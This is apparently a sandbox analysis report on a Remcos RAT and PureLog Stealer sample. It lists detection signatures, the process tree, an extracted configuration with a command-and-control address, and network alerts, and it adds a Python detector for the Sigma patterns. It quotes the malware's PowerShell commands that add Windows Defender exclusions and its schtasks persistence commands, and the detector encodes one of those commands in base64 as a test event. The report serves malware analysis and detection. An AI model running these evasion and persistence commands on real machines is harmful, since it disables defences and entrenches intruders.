
Windows Analysis Report
PEbZthAqV9.exe

Overview

General Information

Sample name: PEbZthAqV9.exe (renamed because the original name is a hash value)
Original sample name: 10ab4b6fb83aea3840ac04855974f62d.exe
Analysis ID: 1570841
MD5: 10ab4b6fb83aea3840ac04855974f62d
SHA1: c41572120bb8f298d4a8683321e7a3b1cc7c54da
SHA256: 8c62537b7b875c364a79b98adaa8d341b4a52e4d0a27697f0f07b1209ed53301
Tags: exe, RAT, RemcosRAT, user-abuse_ch

Detection

Remcos, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Remcos RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PEbZthAqV9.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\PEbZthAqV9.exe" MD5: 10AB4B6FB83AEA3840AC04855974F62D)
    • powershell.exe (PID: 7664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7688 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8120 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7792 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PEbZthAqV9.exe (PID: 7952 cmdline: "C:\Users\user\Desktop\PEbZthAqV9.exe" MD5: 10AB4B6FB83AEA3840AC04855974F62D)
  • myTuDsvNcebev.exe (PID: 8016 cmdline: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe MD5: 10AB4B6FB83AEA3840AC04855974F62D)
    • schtasks.exe (PID: 1740 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp7C97.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • myTuDsvNcebev.exe (PID: 5964 cmdline: "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe" MD5: 10AB4B6FB83AEA3840AC04855974F62D)
    • myTuDsvNcebev.exe (PID: 5776 cmdline: "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe" MD5: 10AB4B6FB83AEA3840AC04855974F62D)
    • myTuDsvNcebev.exe (PID: 4904 cmdline: "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe" MD5: 10AB4B6FB83AEA3840AC04855974F62D)
    • myTuDsvNcebev.exe (PID: 4268 cmdline: "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe" MD5: 10AB4B6FB83AEA3840AC04855974F62D)
    • myTuDsvNcebev.exe (PID: 2312 cmdline: "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe" MD5: 10AB4B6FB83AEA3840AC04855974F62D)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Malware configuration (Remcos):
{
  "Host:Port:Password": ["41.216.183.238:7112:1"],
  "Assigned name": "RemoteHost",
  "Connect interval": "1",
  "Install flag": "Disable",
  "Setup HKCU\\Run": "Enable",
  "Setup HKLM\\Run": "Enable",
  "Install path": "Application path",
  "Copy file": "remcos.exe",
  "Startup value": "Remcos",
  "Hide file": "Disable",
  "Mutex": "Rmc-Y7J88P",
  "Keylog flag": "0",
  "Keylog path": "Application path",
  "Keylog file": "logs.dat",
  "Keylog crypt": "Disable",
  "Hide keylog file": "Disable",
  "Screenshot flag": "Disable",
  "Screenshot time": "1",
  "Take Screenshot option": "Disable",
  "Take screenshot title": "",
  "Take screenshot time": "5",
  "Screenshot path": "AppData",
  "Screenshot file": "Screenshots",
  "Screenshot crypt": "Disable",
  "Mouse option": "Disable",
  "Delete file": "Disable",
  "Audio record time": "5",
  "Audio folder": "MicRecords",
  "Connect delay": "0",
  "Copy folder": "Remcos",
  "Keylog folder": "remcos",
  "Keylog file max size": "100"
}
Source | Rule | Description | Author
00000012.00000002.1910984680.000000000124B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000000.00000002.1834812761.0000000007410000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  Strings:
  • 0x67b50:$a1: Remcos restarted by watchdog!
  • 0xdd170:$a1: Remcos restarted by watchdog!
  • 0xfdf90:$a1: Remcos restarted by watchdog!
  • 0x680a8:$a3: %02i:%02i:%02i:%03i
  • 0xdd6c8:$a3: %02i:%02i:%02i:%03i
  • 0xfe4e8:$a3: %02i:%02i:%02i:%03i
  • 0x6842d:$a4: * Remcos v
  • 0xdda4d:$a4: * Remcos v
  • 0xfe86d:$a4: * Remcos v
00000000.00000002.1831199918.0000000003D51000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
(12 entries in total; remaining entries not shown)
Source | Rule | Description | Author
0.2.PEbZthAqV9.exe.7410000.4.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.PEbZthAqV9.exe.7410000.4.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.PEbZthAqV9.exe.3d6e790.3.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
18.2.myTuDsvNcebev.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
18.2.myTuDsvNcebev.exe.400000.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  Strings:
  • 0x679e0:$a1: Remcos restarted by watchdog!
  • 0x67f38:$a3: %02i:%02i:%02i:%03i
  • 0x682bd:$a4: * Remcos v
(22 entries in total; remaining entries not shown)

                  System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PEbZthAqV9.exe", ParentImage: C:\Users\user\Desktop\PEbZthAqV9.exe, ParentProcessId: 7412, ParentProcessName: PEbZthAqV9.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe", ProcessId: 7664, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PEbZthAqV9.exe", ParentImage: C:\Users\user\Desktop\PEbZthAqV9.exe, ParentProcessId: 7412, ParentProcessName: PEbZthAqV9.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe", ProcessId: 7664, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp7C97.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp7C97.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe, ParentImage: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe, ParentProcessId: 8016, ParentProcessName: myTuDsvNcebev.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp7C97.tmp", ProcessId: 1740, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PEbZthAqV9.exe", ParentImage: C:\Users\user\Desktop\PEbZthAqV9.exe, ParentProcessId: 7412, ParentProcessName: PEbZthAqV9.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp", ProcessId: 7792, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PEbZthAqV9.exe", ParentImage: C:\Users\user\Desktop\PEbZthAqV9.exe, ParentProcessId: 7412, ParentProcessName: PEbZthAqV9.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe", ProcessId: 7664, ProcessName: powershell.exe

                  Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PEbZthAqV9.exe", ParentImage: C:\Users\user\Desktop\PEbZthAqV9.exe, ParentProcessId: 7412, ParentProcessName: PEbZthAqV9.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp", ProcessId: 7792, ProcessName: schtasks.exe
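Detection logic for the process-creation patterns behind the Sigma hits in the System Summary and Persistence sections above: PowerShell adding a Defender exclusion with Add-MpPreference (in clear text, and in the base64 form the "Powershell Base64 Encoded MpPreference Cmdlet" rule targets), schtasks /Create /XML reading the task definition from a temp folder, and schtasks /Create spawned by a parent in a user-writable location. This is an added example and my own code, not the sandbox's, the report's, or the Sigma project's: base64offset_patterns reimplements the semantics of Sigma's base64offset modifier, the "user-writable parent" rule is a heuristic of mine rather than the named Sigma rule, the events are constructed to mirror PIDs 7664, 7792 and 1740 from the process tree, and PIDs 9001 to 9003 are hypothetical (an encoded variant and two benign controls).

```python
"""Process-creation detections mirroring the Sigma matches in this report.

Added example: my own reimplementation of the patterns the report's Sigma hits
describe, run over constructed events that mirror the sandbox's process tree.
Not the sandbox's log and not the Sigma project's code.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """The few Sysmon Event 1 / Security 4688 fields the rules need."""
    pid: int
    image: str
    command_line: str
    parent_image: str


def base64offset_patterns(needle: bytes) -> list[str]:
    """Base64 fragments matching `needle` at each of the three 3-byte alignments.

    This is the Sigma `base64offset` modifier: simulate alignment i by prefixing
    i bytes, then drop the leading characters that still carry prefix bits and the
    trailing characters that carry padding bits, so only fully determined
    characters remain and the fragment can be searched for without decoding.
    """
    start = (0, 2, 3)        # leading chars contaminated by the i prefix bytes
    end = (None, -3, -2)     # trailing chars contaminated by padding, by (len + i) % 3
    fragments = []
    for i in range(3):
        enc = base64.b64encode(b" " * i + needle).decode("ascii")
        fragments.append(enc[start[i]:end[(len(needle) + i) % 3]])
    return fragments


# UTF-8 covers a cmdlet smuggled inside any base64 blob; UTF-16LE is what
# powershell.exe -EncodedCommand actually decodes.
MPPREF_NEEDLES = ("Add-MpPreference", "Set-MpPreference")
MPPREF_B64 = tuple(
    frag
    for needle in MPPREF_NEEDLES
    for raw in (needle.encode("utf-8"), needle.encode("utf-16le"))
    for frag in base64offset_patterns(raw)
)

TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|%temp%|%tmp%", re.I)
USER_WRITABLE_RE = re.compile(r"\\AppData\\(Local|Roaming)\\|\\Users\\Public\\|\\Temp\\", re.I)


def rule_defender_exclusion(ev: ProcEvent) -> list[str]:
    """PowerShell touching Defender preferences, in clear text and/or base64."""
    if not ev.image.lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        return []
    labels = []
    if "mppreference" in ev.command_line.lower():
        labels.append("plain")
    if any(frag in ev.command_line for frag in MPPREF_B64):
        labels.append("base64")
    return labels


def rule_schtasks_xml_from_temp(ev: ProcEvent) -> bool:
    """schtasks /Create /XML with the task definition read from a temp folder."""
    cl = ev.command_line.lower()
    return (ev.image.lower().endswith("\\schtasks.exe")
            and "/create" in cl and "/xml" in cl
            and TEMP_DIR_RE.search(ev.command_line) is not None)


def rule_schtasks_userwritable_parent(ev: ProcEvent) -> bool:
    """schtasks /Create whose parent runs from a user-writable folder (my heuristic)."""
    return (ev.image.lower().endswith("\\schtasks.exe")
            and "/create" in ev.command_line.lower()
            and USER_WRITABLE_RE.search(ev.parent_image) is not None)


def evaluate(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map PID -> sorted names of the rules that fired; PIDs without a hit are omitted."""
    findings: dict[int, list[str]] = {}
    for ev in events:
        hits = [f"defender_exclusion:{lab}" for lab in rule_defender_exclusion(ev)]
        if rule_schtasks_xml_from_temp(ev):
            hits.append("schtasks_xml_from_temp")
        if rule_schtasks_userwritable_parent(ev):
            hits.append("schtasks_userwritable_parent")
        if hits:
            findings[ev.pid] = sorted(hits)
    return findings


def encoded_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
ST = r"C:\Windows\SysWOW64\schtasks.exe"
DROPPER = r"C:\Users\user\Desktop\PEbZthAqV9.exe"
COPY = r"C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"

# Constructed events: the first three mirror PIDs 7664, 7792 and 1740 from the
# process tree; 9001-9003 are hypothetical (an encoded variant, two benign controls).
SAMPLE_EVENTS = [
    ProcEvent(7664, PS, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
              r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe"', DROPPER),
    ProcEvent(7792, ST, r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" '
              r'/XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp"', DROPPER),
    ProcEvent(1740, ST, r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" '
              r'/XML "C:\Users\user\AppData\Local\Temp\tmp7C97.tmp"', COPY),
    ProcEvent(9001, PS, "powershell.exe -NoProfile -EncodedCommand " + encoded_command(
              r'$p=1;Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"'), DROPPER),
    ProcEvent(9002, ST, r'schtasks.exe /Query /TN "Updates\myTuDsvNcebev"', r"C:\Windows\System32\cmd.exe"),
    ProcEvent(9003, PS, "powershell.exe Get-MpComputerStatus", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for pid, hits in evaluate(SAMPLE_EVENTS).items():
        print(pid, ", ".join(hits))
```

Run it directly to print the PIDs that fire. The fragments in MPPREF_B64 are what a SIEM string search needs when the decoded command line is not available; only the UTF-16LE variants match a real -EncodedCommand argument, the UTF-8 ones cover base64 blobs that decode to plain text.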

                  Stealing of Sensitive Information

Source: Registry Key set | Author: Joe Security | Data: Details: EF 8F 79 60 F6 B6 ED F0 50 2C BB F8 CB B9 E5 A7 44 E1 3A 21 42 C7 A1 50 C5 A2 05 0A 33 E5 7A 6D A5 5F B0 85 D7 49 4D 93 6C B8 88 7A 73 17 5B 7A 97 AA 02 3F 93 9E 83 50 9D 55 AD 39 0F C2 68 6A 01 37 0E 13 52 E5 4A 9E FA D6 9D BD, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PEbZthAqV9.exe, ProcessId: 7952, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-Y7J88P\exepath
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-08T09:04:13.806353+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49737 | 41.216.183.238 | 7112 | TCP
2024-12-08T09:04:16.575929+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49738 | 178.237.33.50 | 80 | TCP


                  AV Detection

Source: 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["41.216.183.238:7112:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-Y7J88P", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100"}
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | ReversingLabs: Detection: 63%
Source: PEbZthAqV9.exe | ReversingLabs: Detection: 63%
Source: Yara match | File source: 18.2.myTuDsvNcebev.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PEbZthAqV9.exe.48f8790.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PEbZthAqV9.exe.4883170.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.myTuDsvNcebev.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PEbZthAqV9.exe.48f8790.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PEbZthAqV9.exe.4883170.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000012.00000002.1910984680.000000000124B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4179854421.0000000001257000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PEbZthAqV9.exe PID: 7412, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: PEbZthAqV9.exe PID: 7952, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: myTuDsvNcebev.exe PID: 2312, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Joe Sandbox ML: detected
Source: PEbZthAqV9.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext | 18_2_004315EC
Source: PEbZthAqV9.exe, 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY----- | memstr_8406356f-7
Source: PEbZthAqV9.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PEbZthAqV9.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: JzWg.pdbSHA256 | source: PEbZthAqV9.exe, myTuDsvNcebev.exe.0.dr
Source: Binary string: JzWg.pdb | source: PEbZthAqV9.exe, myTuDsvNcebev.exe.0.dr
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose | 18_2_0041A01B
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose | 18_2_0040B28E
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose | 18_2_0040838E
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose | 18_2_004087A0
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose | 18_2_00407848
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_004068CD FindFirstFileW,FindNextFileW | 18_2_004068CD
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose | 18_2_0040AA71
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW | 18_2_00417AAB
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose | 18_2_0040AC78
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW | 18_2_00406D28
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 4x nop then jmp 0754EFCAh | 0_2_0754F3B6

                  Networking

Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49737 -> 41.216.183.238:7112
Source: Malware configuration extractor | IPs: 41.216.183.238
Source: global traffic | TCP traffic: 192.168.2.4:49737 -> 41.216.183.238:7112
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View | ASN Name: AS40676US AS40676US
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49738 -> 178.237.33.50:80
Source: unknown | TCP traffic detected without corresponding DNS query: 41.216.183.238 (17 connections listed)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
